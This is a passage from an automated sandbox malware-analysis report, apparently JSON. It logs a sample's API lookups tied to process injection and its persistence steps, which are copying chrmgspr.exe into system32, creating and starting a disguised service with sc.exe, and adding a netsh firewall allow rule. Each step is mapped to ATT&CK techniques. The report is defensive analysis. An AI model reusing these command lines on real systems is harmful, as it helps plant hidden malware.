with a parameter ReadFile (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004084)\n \"chrmgspr.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00004084)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00004288)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004288)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004144)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00004144)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00004144)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00004144)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00004144)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00004144)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"chrmgspr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67EE524C.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"chrmgspr.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"DISMHOST.EXE.67EE524C.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"chrmgspr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"chrmgspr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e486b@ADVAPI32.dll\"\n \"0e000f00703f486b@ADVAPI32.dll\"\n \"0e000f00cc3f486b@ADVAPI32.dll\"\n \"11001200b447486b@ADVAPI32.dll\"\n \"110012004848486b@ADVAPI32.dll\"\n \"120013008c48486b@ADVAPI32.dll\"\n \"12001300e448486b@ADVAPI32.dll\"\n \"14001500dc6f486b@ADVAPI32.dll\"\n \"14001500f46f486b@ADVAPI32.dll\"\n \"140015000c70486b@ADVAPI32.dll\"\n \"170018002470486b@ADVAPI32.dll\"\n \"0d000e003c70486b@ADVAPI32.dll\"\n \"110012004c70486b@ADVAPI32.dll\"\n \"110012006070486b@ADVAPI32.dll\"\n \"0d000e003449486b@SHELL32.dll\"\n \"0d000e00b049486b@SHELL32.dll\"\n \"0f001000a071486b@ADVAPI32.dll\"\n \"14001500e071486b@ADVAPI32.dll\"\n \"14001500f871486b@ADVAPI32.dll\"\n \"0c000d004072486b@ADVAPI32.dll\"\n \"0c000d005072486b@ADVAPI32.dll\"\n \"0e000f006072486b@ADVAPI32.dll\"\n \"0e000f007072486b@ADVAPI32.dll\"\n \"0b000c008072486b@ADVAPI32.dll\"\n \"18001900b874486b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005760)\n \"cmd.exe\" called \"CreateDirectoryW\" with parameter %WINDIR%\\system32\\tpxhoiko\\ (UID: 00000000-00006032)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\tpxhoiko\\\" - (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\chrmgspr.exe\" %WINDIR%\\system32\\tpxhoiko\\\" - (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create tpxhoiko binPath= \"%WINDIR%\\system32\\tpxhoiko\\chrmgspr.exe /d\\\"C:\\888c11e124610c7af11109f3b2\" - (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description tpxhoiko \"wifi internet conection\"\" - (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start tpxhoiko\" - (UID: 00000000-00005760)\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00005760)\n \"chrmgspr.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00004084)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76AE0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76AE0000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76AE0000\n \"chrmgspr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76AE0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76AE0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76AE0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2dd1305f9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-275", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a named pipe", "description": "\"svchost.exe\" called \"CreateNamedPipeA\" with parameter \"\\\\.\\pipe\\uqyipjlp\"\n dwOpenMode: \"1073741827\"\n dwPipeMode: \"0\" - (UID: 00000000-00004144)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"cmd.exe\" (UID: 00000000-00006032) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"cmd.exe\" (UID: 00000000-00006032) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"chrmgspr.exe\" (UID: 00000000-00004084) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"chrmgspr.exe\" (UID: 00000000-00004084) was launched with missing environment variables: \"LOGONSERVER, USERDNSDOMAIN, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00004288) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", USERDNSDOMAIN=\"%OSUSER%-PC\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00004288) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"svchost.exe\" (UID: 00000000-00004144) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, USERDNSDOMAIN, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00004144) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00006032)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\chrmgspr.exe\" %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00006072)\n Spawned process \"sc.exe\" with commandline \"create tpxhoiko binPath= \"%WINDIR%\\\\system32\\\\tpxhoiko\\\\chrmgspr ...\" (UID: 00000000-00006016), Spawned process \"sc.exe\" with commandline \"description tpxhoiko \"wifi internet conection\"\" (UID: 00000000-00006128), Spawned process \"sc.exe\" with commandline \"start tpxhoiko\" (UID: 00000000-00005936), Spawned process \"chrmgspr.exe\" with commandline \"/d\"C:\\\\888c11e124610c7af11109f3b28f1046c0123daaf6ce5da755d192d2d ...\" (UID: 00000000-00004084)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00004288), Spawned process \"svchost.exe\" (UID: 00000000-00004144)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\chrmgspr.exe\" %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00006072)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00006032)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\chrmgspr.exe\" %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00006072)\n Spawned process \"sc.exe\" with commandline \"create tpxhoiko binPath= \"%WINDIR%\\\\system32\\\\tpxhoiko\\\\chrmgspr ...\" (UID: 00000000-00006016), Spawned process \"sc.exe\" with commandline \"description tpxhoiko \"wifi internet conection\"\" (UID: 